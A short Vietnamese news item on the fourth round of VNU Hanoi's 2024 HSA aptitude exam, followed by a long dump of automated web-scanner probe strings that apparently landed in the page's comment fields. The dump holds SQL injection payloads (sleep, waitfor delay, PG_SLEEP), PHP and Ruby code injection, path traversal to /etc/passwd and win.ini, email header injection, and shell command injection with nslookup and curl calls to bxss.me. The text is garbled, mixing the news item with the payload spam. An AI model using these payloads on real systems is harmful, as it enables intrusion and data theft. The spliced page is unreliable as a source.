Đợt thi thứ 4 kỳ thi đánh giá năng lực (HSA 2024) của ĐHQGHN đã diễn ra trong hai ngày 11 và 12/5/2024. Trong đợt thi này có 24.304 thí sinh đăng ký dự thi và có 2 thí sinh bị đình chỉ thi do vi phạm quy chế thi.
Đợt thi HSA 404 diễn ra tại 15 địa điểm thi gồm: Trung tâm Khảo thí ĐHQGHN, Trường ĐH Công nghệ, Trường Đại học Khoa học Xã hội và Nhân văn, Trường Đại học Kinh tế Quốc dân, Học viện Ngân hàng, Trường Đại học Tài nguyên và Môi trường Hà Nội, Đại học Thái Nguyên, Trường ĐH Sư phạm Kỹ thuật Nam Định, Trường ĐH Sư phạm Kỹ thuật Hưng Yên, Trường ĐH Sao Đỏ (Hải Dương), Trường Đại học Thái Bình, Trường Đại học Hoa Lư (Ninh Bình), Trường Đại học Hàng hải Việt Nam (Hải Phòng), Trường Đại học Hồng Đức (Thanh Hóa) Trường ĐH Vinh (Nghệ An).
Tổng số thí sinh đăng ký dự thi theo danh sách là 24.304, tỉ lệ dự thi đạt 96,4%. Đợt thi thứ tư có 02 thí sinh bị đình chỉ thi. Đến thời điểm hiện tại, Trung tâm Khảo thí ĐHQGHN đã hoàn thành 4 trong tổng số 6 đợt thi HSA năm 2024, hơn 74.000 lượt thi đã hoàn thành trong thời gian qua.
Đợt thi HSA 405 kế tiếp diễn ra ngày 25 và 26/5/2024 tại các tỉnh thành gồm Hà Nội, Thái Nguyên, Nam Định, Hải Dương, Hưng Yên, Nam Định, Thái Bình, Ninh Bình, số thí sinh đăng ký dự thi là 15.564.
Trước đó, Hội đồng thi Đánh giá năng lực học sinh trung học phổ thông năm 2024 của Đại học Quốc gia Hà Nội đã công bố phổ điểm của ba đợt thi đầu tiên với mức điểm ≥ 110 chiếm tỉ lệ gần 1%; số lượt thi đạt ≥ 100 điểm chiếm 5,4%; đạt mức điểm ≥ 90 khoảng 18,1%; đạt điểm ≥ 80 điểm có 41,8%; mức điểm ≥ 75 có khoảng 56,4%.
VNU Media - Trung tâm Khảo thí ĐHQGHN
.png "CON ĐƯỜNG TĂNG TRƯỞNG THÀNH CÔNG CỦA TRUNG QUỐC QUA CUỐN SÁCH “TRUNG QUỐC 2049: HƯỚNG ĐẾN CƯỜNG QUỐC KINH TẾ THẾ GIỚI”")
555
'.gethostbyname(lc('hitwz'.'edehbkqefa4d3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(84).chr(99).chr(82).'
".gethostbyname(lc("hitpx"."zkjaigca9652d.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(83).chr(107).chr(84)."
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
555
"+"A".concat(70-3).concat(22*4).concat(106).concat(75).concat(97).concat(71)+(require"socket"
Socket.gethostbyname("hitir"+"jqgccucy7b497.bxss.me.")[3].to_s)+"
";print(md5(31337));$a="
555
'+'A'.concat(70-3).concat(22*4).concat(111).concat(82).concat(108).concat(81)+(require'socket'
Socket.gethostbyname('hitxy'+'bkktfebq84699.bxss.me.')[3].to_s)+'
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
NewsCommentAdd
555
555
555
NewsCommentAdd/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+57-57-1=0+0+0+1 --
-1 OR 2+676-676-1=0+0+0+1
'.gethostbyname(lc('hitks'.'mzyoctap97c98.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(78).chr(97).chr(70).'
-1' OR 2+429-429-1=0+0+0+1 --
".gethostbyname(lc("hitla"."htsmhjpae16ca.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(81).chr(107).chr(77)."
-1' OR 2+552-552-1=0+0+0+1 or 'vsyIRnxm'='
555
-1" OR 2+20-20-1=0+0+0+1 --
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
"+"A".concat(70-3).concat(22*4).concat(110).concat(79).concat(100).concat(79)+(require"socket"
Socket.gethostbyname("hitof"+"kucweswj424d8.bxss.me.")[3].to_s)+"
";print(md5(31337));$a="
'+'A'.concat(70-3).concat(22*4).concat(109).concat(74).concat(106).concat(73)+(require'socket'
Socket.gethostbyname('hitjm'+'yoinjpws57b05.bxss.me.')[3].to_s)+'
NewsCommentAdd
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
NewsCommentAdd/.
'.print(md5(31337)).'
555
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
mPgFC959'; waitfor delay '0:0:15' --
PfrTXmij'); waitfor delay '0:0:15' --
KVnmue2r')); waitfor delay '0:0:15' --
-5 OR 113=(SELECT 113 FROM PG_SLEEP(15))--
-5) OR 366=(SELECT 366 FROM PG_SLEEP(15))--
-1)) OR 908=(SELECT 908 FROM PG_SLEEP(15))--
Yt4f8qUK' OR 180=(SELECT 180 FROM PG_SLEEP(15))--
K3L4ToNF') OR 187=(SELECT 187 FROM PG_SLEEP(15))--
qChpy7Ej')) OR 50=(SELECT 50 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@T5y6O
555
555
555
-1 OR 2+902-902-1=0+0+0+1 --
-1 OR 2+794-794-1=0+0+0+1
-1' OR 2+468-468-1=0+0+0+1 --
-1' OR 2+316-316-1=0+0+0+1 or 'guwDySVl'='
555
-1" OR 2+724-724-1=0+0+0+1 --
555
555
555
555
555
if(now()=sysdate(),sleep(15),0)
555
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
555
-1); waitfor delay '0:0:15' --
555
-1)); waitfor delay '0:0:15' --
555
1 waitfor delay '0:0:15' --
RewHnoTR'; waitfor delay '0:0:15' --
555
TEz5YVe7'); waitfor delay '0:0:15' --
555
17bmjGYv')); waitfor delay '0:0:15' --
555
-5 OR 814=(SELECT 814 FROM PG_SLEEP(15))--
555
-5) OR 392=(SELECT 392 FROM PG_SLEEP(15))--
555
-1)) OR 88=(SELECT 88 FROM PG_SLEEP(15))--
555
555
U4n3dqVf' OR 189=(SELECT 189 FROM PG_SLEEP(15))--
555
555
xAYxUOcl') OR 624=(SELECT 624 FROM PG_SLEEP(15))--
iCfqzdMT')) OR 703=(SELECT 703 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@xgun3
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1
555
555
1
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
"+"A".concat(70-3).concat(22*4).concat(102).concat(66).concat(106).concat(71)+(require"socket"
Socket.gethostbyname("hitnv"+"znpszbbd27442.bxss.me.")[3].to_s)+"
555
'.gethostbyname(lc('hityp'.'iqqjalqi25d5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(88).chr(114).chr(65).'
${9999641+9999730}
555&n920252=v963398
'+'A'.concat(70-3).concat(22*4).concat(109).concat(78).concat(120).concat(86)+(require'socket'
Socket.gethostbyname('hitzu'+'wqdsidybccfdc.bxss.me.')[3].to_s)+'
response.write(9196711*9621944)
".gethostbyname(lc("hitwr"."womogbgx176a3.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(67).chr(100).chr(90)."
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)
555
xfs.bxss.me
555
555
'+response.write(9196711*9621944)+'
555
!(()&&!|*|*|
555
555
555
555
"+response.write(9196711*9621944)+"
555
^(#$!@#$)(()))******
555
'"
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
<!--
3bmVZbCr
555
NewsCommentAdd
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
';print(md5(31337));$a='
555
555
555
";print(md5(31337));$a="
NewsCommentAdd/.
555
555
555
555
${@print(md5(31337))}
555
555
bcc:0.39972-4588.39972.d3973.19937.2@bxss.me
555
555
555
Http://bxss.me/t/fit.txt
${@print(md5(31337))}\
echo uajqcf$()\ htbeep\nz^xyu||a #' &echo uajqcf$()\ htbeep\nz^xyu||a #|" &echo uajqcf$()\ htbeep\nz^xyu||a #
555
555
../../../../../../../../../../../../../../etc/passwd
http://bxss.me/t/fit.txt?.jpg
'.print(md5(31337)).'
&echo nuzjqc$()\ ltaayu\nz^xyu||a #' &echo nuzjqc$()\ ltaayu\nz^xyu||a #|" &echo nuzjqc$()\ ltaayu\nz^xyu||a #
555
555
555
../../../../../../../../../../../../../../windows/win.ini
/etc/shells
555
555&echo zyyxim$()\ lyclrj\nz^xyu||a #' &echo zyyxim$()\ lyclrj\nz^xyu||a #|" &echo zyyxim$()\ lyclrj\nz^xyu||a #
555
to@example.com>
bcc:0.39972-4589.39972.d3973.19937.2@bxss.me
file:///etc/passwd
555
c:/windows/win.ini
555
555
555
555
555
bxss.me
555
../555
555
555
555
555
555
|echo eogyhi$()\ eoclst\nz^xyu||a #' |echo eogyhi$()\ eoclst\nz^xyu||a #|" |echo eogyhi$()\ eoclst\nz^xyu||a #
555
555|echo lgbtjc$()\ svftfp\nz^xyu||a #' |echo lgbtjc$()\ svftfp\nz^xyu||a #|" |echo lgbtjc$()\ svftfp\nz^xyu||a #
555
555
555
(nslookup -q=cname hitdvkeylzibn99f5e.bxss.me||curl hitdvkeylzibn99f5e.bxss.me))
555
'"()
555
555
555
$(nslookup -q=cname hitxruxplnvklf9131.bxss.me||curl hitxruxplnvklf9131.bxss.me)
555
555'&&sleep(27*1000)*vihgvw&&'
555
555
555
555"&&sleep(27*1000)*sicakf&&"
&nslookup -q=cname hitximbukndno328e8.bxss.me&'\"`0&nslookup -q=cname hitximbukndno328e8.bxss.me&`'
555
555'||sleep(27*1000)*knxtaw||'
555
&(nslookup -q=cname hitgscxrkjpce6ab6f.bxss.me||curl hitgscxrkjpce6ab6f.bxss.me)&'\"`0&(nslookup -q=cname hitgscxrkjpce6ab6f.bxss.me||curl hitgscxrkjpce6ab6f.bxss.me)&`'
555"||sleep(27*1000)*cyriji||"
555
|(nslookup -q=cname hitmytfboupfca06b3.bxss.me||curl hitmytfboupfca06b3.bxss.me)
`(nslookup -q=cname hitszjzugyihlfa110.bxss.me||curl hitszjzugyihlfa110.bxss.me)`
;(nslookup -q=cname hitgrgpkhgchf0487d.bxss.me||curl hitgrgpkhgchf0487d.bxss.me)|(nslookup -q=cname hitgrgpkhgchf0487d.bxss.me||curl hitgrgpkhgchf0487d.bxss.me)&(nslookup -q=cname hitgrgpkhgchf0487d.bxss.me||curl hitgrgpkhgchf0487d.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+362-362-1=0+0+0+1 --
555
-1 OR 2+601-601-1=0+0+0+1
555
-1' OR 2+421-421-1=0+0+0+1 --
555
555
555
555
555
555
555
-1' OR 2+233-233-1=0+0+0+1 or 'Dtw7I8He'='
555
-1" OR 2+945-945-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
-1; waitfor delay '0:0:15' --
555
555
555
555
555
1
-1); waitfor delay '0:0:15' --
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
555
1
1
${9999128+10000001}
"+"A".concat(70-3).concat(22*4).concat(113).concat(82).concat(122).concat(72)+(require"socket"
Socket.gethostbyname("hitnt"+"ouuvdsthac167.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(112).concat(69).concat(112).concat(87)+(require'socket'
Socket.gethostbyname('hitlu'+'cliamgyn13357.bxss.me.')[3].to_s)+'
1
1
-1)); waitfor delay '0:0:15' --
1
1
1
'.gethostbyname(lc('hitzz'.'luvnslafedc57.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(83).chr(110).chr(70).'
1
1
".gethostbyname(lc("hituc"."kvsviyiyd831a.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(81).chr(112).chr(65)."
1
1
1
1
1
)
1
1
1
1
1 waitfor delay '0:0:15' --
'"
!(()&&!|*|*|
1<esi:include src="http://bxss.me/rpb.png"/>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
response.write(9055700*9504661)
1%0abcc:0.39972-7267.39972.3433f.19937.2@bxss.me
<!--
^(#$!@#$)(()))******
'+response.write(9055700*9504661)+'
to@example.com>%0d%0abcc:0.39972-7268.39972.3433f.19937.2@bxss.me
1
1
1
1
1
1
1
1
"+response.write(9055700*9504661)+"
1
1
1
1
SPrkc7xu'; waitfor delay '0:0:15' --
1
1
1
1
1
1
1
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
1
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
1
1
1
Http://bxss.me/t/fit.txt
1
qsuA9KJu'); waitfor delay '0:0:15' --
1
http://bxss.me/t/fit.txt%3F.jpg
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
1
/etc/shells
echo idowcq$()\ dhukly\nz^xyu||a #' &echo idowcq$()\ dhukly\nz^xyu||a #|" &echo idowcq$()\ dhukly\nz^xyu||a #
c:/windows/win.ini
';print(md5(31337));$a='
&echo nozkzn$()\ hyglbh\nz^xyu||a #' &echo nozkzn$()\ hyglbh\nz^xyu||a #|" &echo nozkzn$()\ hyglbh\nz^xyu||a #
bxss.me
'"()
file:///etc/passwd
";print(md5(31337));$a="
1&echo eeatbc$()\ icaxzm\nz^xyu||a #' &echo eeatbc$()\ icaxzm\nz^xyu||a #|" &echo eeatbc$()\ icaxzm\nz^xyu||a #
1'&&sleep(27*1000)*rzeczy&&'
1
${@print(md5(31337))}
|echo kgizez$()\ yumrtm\nz^xyu||a #' |echo kgizez$()\ yumrtm\nz^xyu||a #|" |echo kgizez$()\ yumrtm\nz^xyu||a #
1"&&sleep(27*1000)*nsswdh&&"
${@print(md5(31337))}\
1'||sleep(27*1000)*oqlubv||'
1|echo kqnngh$()\ khmtor\nz^xyu||a #' |echo kqnngh$()\ khmtor\nz^xyu||a #|" |echo kqnngh$()\ khmtor\nz^xyu||a #
'.print(md5(31337)).'
QzaPWDHE')); waitfor delay '0:0:15' --
1"||sleep(27*1000)*dohqzf||"
(nslookup -q=cname hitxubagfdrnh342bc.bxss.me||curl hitxubagfdrnh342bc.bxss.me))
../1
$(nslookup -q=cname hityrkcpomkyca4c42.bxss.me||curl hityrkcpomkyca4c42.bxss.me)
1
&nslookup -q=cname hitqgryaawjtt8cfab.bxss.me&'\"`0&nslookup -q=cname hitqgryaawjtt8cfab.bxss.me&`'
&(nslookup -q=cname hituqrsetugeac2885.bxss.me||curl hituqrsetugeac2885.bxss.me)&'\"`0&(nslookup -q=cname hituqrsetugeac2885.bxss.me||curl hituqrsetugeac2885.bxss.me)&`'
|(nslookup -q=cname hittgrbovlleh7844c.bxss.me||curl hittgrbovlleh7844c.bxss.me)
`(nslookup -q=cname hitcyzmnzckso5e577.bxss.me||curl hitcyzmnzckso5e577.bxss.me)`
;(nslookup -q=cname hitcbhwnizfstdb7a4.bxss.me||curl hitcbhwnizfstdb7a4.bxss.me)|(nslookup -q=cname hitcbhwnizfstdb7a4.bxss.me||curl hitcbhwnizfstdb7a4.bxss.me)&(nslookup -q=cname hitcbhwnizfstdb7a4.bxss.me||curl hitcbhwnizfstdb7a4.bxss.me)
1
-5 OR 811=(SELECT 811 FROM PG_SLEEP(15))--
-5) OR 396=(SELECT 396 FROM PG_SLEEP(15))--
-1)) OR 881=(SELECT 881 FROM PG_SLEEP(15))--
AoIZgDU3' OR 265=(SELECT 265 FROM PG_SLEEP(15))--
jKoAs7O7') OR 815=(SELECT 815 FROM PG_SLEEP(15))--
P4JGva8J')) OR 242=(SELECT 242 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@HADKv
555
555
555
555
555
555
555
555
555
555
1
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
${10000425+9999264}
555
1
'.gethostbyname(lc('hitly'.'utgaxubb8b680.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(80).chr(117).chr(67).'
"+"A".concat(70-3).concat(22*4).concat(118).concat(84).concat(104).concat(67)+(require"socket"
Socket.gethostbyname("hittz"+"xzrqluof7fa0a.bxss.me.")[3].to_s)+"
555&n907790=v939812
555
".gethostbyname(lc("hitlt"."cnvppngg53010.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(80).chr(111).chr(82)."
response.write(9089978*9073260)
'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(97).concat(67)+(require'socket'
Socket.gethostbyname('hittv'+'yzazibzs0b1da.bxss.me.')[3].to_s)+'
555
xfs.bxss.me
'+response.write(9089978*9073260)+'
555
'"
555
555
555
"+response.write(9089978*9073260)+"
<!--
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
)
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
NewsCommentAdd
555
555
Cay8r7ZB
Http://bxss.me/t/fit.txt
555
bcc:0.33334-4588.33334.be224.19939.2@bxss.me
NewsCommentAdd/.
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
to@example.com>
bcc:0.33334-4589.33334.be224.19939.2@bxss.me
555
http://bxss.me/t/fit.txt?.jpg
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
!(()&&!|*|*|
555
';print(md5(31337));$a='
555
/etc/shells
555
555
555
555
^(#$!@#$)(()))******
";print(md5(31337));$a="
c:/windows/win.ini
555
555
555
555
555
${@print(md5(31337))}
555
bxss.me
555
555
555
555
${@print(md5(31337))}\
555
555
echo xqveef$()\ vgxuas\nz^xyu||a #' &echo xqveef$()\ vgxuas\nz^xyu||a #|" &echo xqveef$()\ vgxuas\nz^xyu||a #
'.print(md5(31337)).'
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
file:///etc/passwd
555
555
&echo pmrzur$()\ cauwtp\nz^xyu||a #' &echo pmrzur$()\ cauwtp\nz^xyu||a #|" &echo pmrzur$()\ cauwtp\nz^xyu||a #
555
555
'"()
555
555
555
555&echo mopkcx$()\ cixjob\nz^xyu||a #' &echo mopkcx$()\ cixjob\nz^xyu||a #|" &echo mopkcx$()\ cixjob\nz^xyu||a #
555
555
../555
555
|echo npkovi$()\ ykqaym\nz^xyu||a #' |echo npkovi$()\ ykqaym\nz^xyu||a #|" |echo npkovi$()\ ykqaym\nz^xyu||a #
555
555
555
555|echo ykiluv$()\ hrtddc\nz^xyu||a #' |echo ykiluv$()\ hrtddc\nz^xyu||a #|" |echo ykiluv$()\ hrtddc\nz^xyu||a #
555
555
(nslookup -q=cname hitieogwlwwiwcd1a1.bxss.me||curl hitieogwlwwiwcd1a1.bxss.me))
555
555'&&sleep(27*1000)*pizdsq&&'
555
555
$(nslookup -q=cname hituokkujkugk55113.bxss.me||curl hituokkujkugk55113.bxss.me)
&nslookup -q=cname hithganamxaaj10685.bxss.me&'\"`0&nslookup -q=cname hithganamxaaj10685.bxss.me&`'
555"&&sleep(27*1000)*kvizbi&&"
555
555
&(nslookup -q=cname hitatqfkgeqqi3e4ff.bxss.me||curl hitatqfkgeqqi3e4ff.bxss.me)&'\"`0&(nslookup -q=cname hitatqfkgeqqi3e4ff.bxss.me||curl hitatqfkgeqqi3e4ff.bxss.me)&`'
555'||sleep(27*1000)*iajoux||'
|(nslookup -q=cname hityfidtjzngt8d249.bxss.me||curl hityfidtjzngt8d249.bxss.me)
555"||sleep(27*1000)*enennq||"
`(nslookup -q=cname hitmplpjunhgz6e92c.bxss.me||curl hitmplpjunhgz6e92c.bxss.me)`
;(nslookup -q=cname hithdelqsxesa6a8e8.bxss.me||curl hithdelqsxesa6a8e8.bxss.me)|(nslookup -q=cname hithdelqsxesa6a8e8.bxss.me||curl hithdelqsxesa6a8e8.bxss.me)&(nslookup -q=cname hithdelqsxesa6a8e8.bxss.me||curl hithdelqsxesa6a8e8.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+639-639-1=0+0+0+1 --
555
-1 OR 2+493-493-1=0+0+0+1
555
555
555
555
555
-1' OR 2+957-957-1=0+0+0+1 --
555
555
-1' OR 2+868-868-1=0+0+0+1 or 'H3IZakXT'='
1
-1" OR 2+842-842-1=0+0+0+1 --
1
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
555
555
1
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
1
-1; waitfor delay '0:0:15' --
1
1
555
555
1
555
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(108).concat(73).concat(117).concat(73)+(require"socket"
Socket.gethostbyname("hitaz"+"jnwpvixc294a4.bxss.me.")[3].to_s)+"
1
1
1
-1); waitfor delay '0:0:15' --
1
'+'A'.concat(70-3).concat(22*4).concat(100).concat(74).concat(103).concat(85)+(require'socket'
Socket.gethostbyname('hitzb'+'oxlrrkmp953e4.bxss.me.')[3].to_s)+'
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'.gethostbyname(lc('hitjv'.'mawfjrsd8c5d6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(84).chr(119).chr(73).'
1
${9999458+9999169}
response.write(9638292*9247202)
".gethostbyname(lc("hitle"."goqaqknjaa058.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(70).chr(99).chr(78)."
1
555
'+response.write(9638292*9247202)+'
1
"+response.write(9638292*9247202)+"
555
)
-1)); waitfor delay '0:0:15' --
1
1
!(()&&!|*|*|
1
1
1
1
1
1
1
1
1
1
1 waitfor delay '0:0:15' --
1
1
^(#$!@#$)(()))******
1<esi:include src="http://bxss.me/rpb.png"/>
1
1
1
1
1
1
'"
1%0abcc:0.33334-6874.33334.3dd0a.19939.2@bxss.me
1
1
1
1
1
<!--
to@example.com>%0d%0abcc:0.33334-6891.33334.3dd0a.19939.2@bxss.me
1
1
1
1
1
1
1
1
5GSFjf7E'; waitfor delay '0:0:15' --
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
../../../../../../../../../../../../../../etc/passwd
1
';print(md5(31337));$a='
Http://bxss.me/t/fit.txt
../../../../../../../../../../../../../../windows/win.ini
";print(md5(31337));$a="
1
http://bxss.me/t/fit.txt%3F.jpg
file:///etc/passwd
1
1
/etc/shells
FUIHTPup'); waitfor delay '0:0:15' --
1
../1
${@print(md5(31337))}
'"()
echo nucdhc$()\ sbrnlo\nz^xyu||a #' &echo nucdhc$()\ sbrnlo\nz^xyu||a #|" &echo nucdhc$()\ sbrnlo\nz^xyu||a #
${@print(md5(31337))}\
c:/windows/win.ini
1'&&sleep(27*1000)*cwiwgb&&'
&echo clfdhq$()\ tuhylh\nz^xyu||a #' &echo clfdhq$()\ tuhylh\nz^xyu||a #|" &echo clfdhq$()\ tuhylh\nz^xyu||a #
'.print(md5(31337)).'
bxss.me
1"&&sleep(27*1000)*syikxr&&"
1&echo suwpxq$()\ oojlhh\nz^xyu||a #' &echo suwpxq$()\ oojlhh\nz^xyu||a #|" &echo suwpxq$()\ oojlhh\nz^xyu||a #
|echo mxwsbv$()\ fqlgdc\nz^xyu||a #' |echo mxwsbv$()\ fqlgdc\nz^xyu||a #|" |echo mxwsbv$()\ fqlgdc\nz^xyu||a #
1
1|echo hiphci$()\ qnfrgm\nz^xyu||a #' |echo hiphci$()\ qnfrgm\nz^xyu||a #|" |echo hiphci$()\ qnfrgm\nz^xyu||a #
1'||sleep(27*1000)*hjiiyg||'
1"||sleep(27*1000)*bxbdse||"
oiIZSAX6')); waitfor delay '0:0:15' --
(nslookup -q=cname hittpwflzhcrw5ae64.bxss.me||curl hittpwflzhcrw5ae64.bxss.me))
1
$(nslookup -q=cname hitdufthsbffjf879f.bxss.me||curl hitdufthsbffjf879f.bxss.me)
&nslookup -q=cname hitnzitxjmuju5036d.bxss.me&'\"`0&nslookup -q=cname hitnzitxjmuju5036d.bxss.me&`'
&(nslookup -q=cname hituhzluuhakrd64c7.bxss.me||curl hituhzluuhakrd64c7.bxss.me)&'\"`0&(nslookup -q=cname hituhzluuhakrd64c7.bxss.me||curl hituhzluuhakrd64c7.bxss.me)&`'
|(nslookup -q=cname hitaleumczwrdea2e1.bxss.me||curl hitaleumczwrdea2e1.bxss.me)
`(nslookup -q=cname hitxjpmtnytvx0f3f9.bxss.me||curl hitxjpmtnytvx0f3f9.bxss.me)`
-5 OR 956=(SELECT 956 FROM PG_SLEEP(15))--
;(nslookup -q=cname hitmxzyolvspd6c9fe.bxss.me||curl hitmxzyolvspd6c9fe.bxss.me)|(nslookup -q=cname hitmxzyolvspd6c9fe.bxss.me||curl hitmxzyolvspd6c9fe.bxss.me)&(nslookup -q=cname hitmxzyolvspd6c9fe.bxss.me||curl hitmxzyolvspd6c9fe.bxss.me)
-5) OR 178=(SELECT 178 FROM PG_SLEEP(15))--
-1)) OR 170=(SELECT 170 FROM PG_SLEEP(15))--
voPWxr0O' OR 445=(SELECT 445 FROM PG_SLEEP(15))--
aoSHayt9') OR 24=(SELECT 24 FROM PG_SLEEP(15))--
kJ5OIL77')) OR 927=(SELECT 927 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@yZDKa
555
555
555
555
555
555
555
1
555
1
1
1
1
1
1
555
1
555
1
555
555
1
555
1
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
"+"A".concat(70-3).concat(22*4).concat(97).concat(66).concat(104).concat(84)+(require"socket"
Socket.gethostbyname("hitez"+"mnckxvdl2ae95.bxss.me.")[3].to_s)+"
${9999779+10000198}
'.gethostbyname(lc('hithe'.'sdscqxtv1c777.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(70).chr(115).chr(85).'
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555&n971248=v922602
'+'A'.concat(70-3).concat(22*4).concat(101).concat(85).concat(99).concat(81)+(require'socket'
Socket.gethostbyname('hitsi'+'oktkovzs0a68f.bxss.me.')[3].to_s)+'
555
555
".gethostbyname(lc("hitcw"."zcvqwctpde3b6.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(84).chr(121).chr(88)."
)
555
555
555
555
!(()&&!|*|*|
555
555
555
response.write(9705147*9732671)
555
'"
^(#$!@#$)(()))******
555
'+response.write(9705147*9732671)+'
<!--
xfs.bxss.me
555
HoXrW8A7
"+response.write(9705147*9732671)+"
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
555
555
';print(md5(31337));$a='
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
";print(md5(31337));$a="
555
Http://bxss.me/t/fit.txt
555
555
${@print(md5(31337))}
NewsCommentAdd
http://bxss.me/t/fit.txt?.jpg
555
bcc:0.33437-4582.33437.6045c.19940.2@bxss.me
